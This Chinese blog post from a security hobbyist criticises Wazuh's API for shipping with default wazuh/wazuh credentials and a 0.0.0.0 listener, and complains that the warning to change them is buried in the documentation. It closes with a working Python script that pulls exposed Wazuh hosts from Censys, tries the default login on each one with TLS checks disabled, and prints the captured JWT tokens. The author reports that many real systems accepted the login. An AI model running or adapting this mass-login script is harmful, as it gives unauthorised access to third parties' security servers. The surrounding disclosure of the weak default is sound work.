loca1h0st's Blog
loca1h0st's Blog

Wazuh API默认用户名密码问题

Wazuh API默认用户名密码问题

前言

使用Quickstart方式安装Wazuh后,默认情况下wazuh会生成一个随机的ADMIN_PASSWORD用于提供给用户登录,此密码强度极高,基本难以暴力破解。

INFO: --- Summary ---
INFO: You can access the web interface https://<wazuh-dashboard-ip>
    User: admin
    Password: <ADMIN_PASSWORD>
INFO: Installation finished.

但同时,Wazuh支持API模块,且API模块的默认配置个人存在一定的不合理性,从而导致安装完成后存在被利用的可能。

问题点

关于API部分,官方文档描述如下(文档链接):

https://blog.mrtblogs.net/wp-content/uploads/2023/05/image-1-1024x460.png
以上文档截图是v4.3版本,目前最新版本是v4.4,修改部分仅仅是将GET的认证方式改成POST,其余部分没有变化。

从文档中可以看到,默认情况下使用自签名证书,且使用wazuh/wazuh的用户名密码进行登录,并非与Web界面的认证密码一致,那如果同时Wazuh API的端口暴露在互联网上或攻击者已经进入企业内网,则可以尝试使用该凭据尝试进行登录。

尝试验证

首先在本地搭建一个wazuh的服务,并访问API接口,获取到wazuh的自签名证书信息:

https://blog.mrtblogs.net/wp-content/uploads/2023/05/image-2-836x1024.png

从证书信息中可以获取到证书的Common Name,使用该参数便可在互联网上找到使用同样证书的服务。当然也可以直接使用端口的指纹或直接55000去zoomeye,shodan这种引擎搜索后过滤。

https://blog.mrtblogs.net/wp-content/uploads/2023/05/image-3-1024x763.png

那知道怎么搜索以及怎么登录后,剩下就是写代码验证了,为了图方便,我这里直接使用chatGPT生成相关代码。

https://blog.mrtblogs.net/wp-content/uploads/2023/05/image-4-1024x661.png
详细代码附在文后;GPT 3.5确实写代码还差了些,来来回回改了4次才彻底完成。

代码成功运行后可以看到,可以成功获取jwt_token的wazuh系统的比例非常高,这也侧面说明了这个wazuh api的默认配置并非十分合理。

https://blog.mrtblogs.net/wp-content/uploads/2023/05/image-6-1024x393.png
仅仅只测试了GET方式,对于405的请求应该换POST用于适配新接口,同时可以尝试wazuh-wui用户

后记

其实在Wazuh的API界面有一个Secure API的说明,但在页面上主要体现的是:To configure the certificates, use the following guide Securing API

只有在解释的内页才提示应该修改默认的API口令,并用红色背景重点提示。

https://blog.mrtblogs.net/wp-content/uploads/2023/05/image-5-1024x279.png
而且还多了一个wazuh-wui的默认用户,且这个用户修改密码会影响到Web界面的正常使用

API的用户修改密码需要用API的方式登录后进行修改,不用API的用户也许永远不知道还有这么一个地方的用户密码需要修改,且默认情况下API监听0.0.0.0地址,这实在不是一个好的设计逻辑。

附代码

import httpx
import asyncio

async def main():
    # 设置请求头,可根据需要自行修改
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
        'Accept': 'application/json',
        'Authorization': 'Basic REPLACE_YOURS'
    }

    # 发送GET请求
    url = "https://search.censys.io/api/v2/hosts/search?virtual_hosts=EXCLUDE&q=%28services.tls.certificates.leaf_data.issuer.common_name%3Dwazuh.com%29+and+services.port%3D%6055000%60"
    response = httpx.get(url, headers=headers)

    # 处理响应数据
    if response.status_code == 200:
        json_data = response.json()
        hits = json_data.get("result", {}).get("hits", [])
        urls = []
        for hit in hits:
            ip = hit.get("ip")
            if ip:
                url = f"https://{ip}:55000/security/user/authenticate?raw=true"
                urls.append(url)

        # 并发访问所有的url
        async def get_url(url, auth):
            async with httpx.AsyncClient(auth=auth, verify=False) as client:
                return await client.get(url)

        auth = httpx.BasicAuth("wazuh", "wazuh")
        tasks = [get_url(url, auth) for url in urls]
        responses = await asyncio.gather(*tasks)

        # 输出结果
        for i, response in enumerate(responses):
            if response.status_code == 200:
                print(f"{hits[i]['ip']} - {response.text}")
            else:
                print(f"{hits[i]['ip']} - {response.status_code}")
    else:
        print(f"请求失败,状态码为:{response.status_code}")

# 运行入口点
asyncio.run(main())
# # # # # # # # #
首页      信息安全      soc      Wazuh API默认用户名密码问题

发表回复

textsms
account_circle
email

  • zangcc

    师傅你好,最近搭建wazuh的时候遇到了坑,想知道这个wazuh api的默认账号密码可以更改吗?而且我搭建好了用它给的curl命令获取不到token,很奇怪。

    3 月前 回复
    • loca1h0st博主

      @zangcc: 可以的,参考这个Link:https://documentation.wazuh.com/4.8/user-manual/api/getting-started.html

      2 月前 回复
arrow_back 上一篇
ocserv配合clash+dnsmasq解决国内外分流问题
arrow_forward 下一篇
广西南宁-南湖公园-Avata

loca1h0st's Blog

Wazuh API默认用户名密码问题
前言 使用Quickstart方式安装Wazuh后,默认情况下wazuh会生成一个随机的ADMIN_PASSWORD用于提供给用户登录,此密码强度极高,基本难以暴力破解。 INFO: --- Summary --- INFO: You …
扫描二维码继续阅读
2023-05-05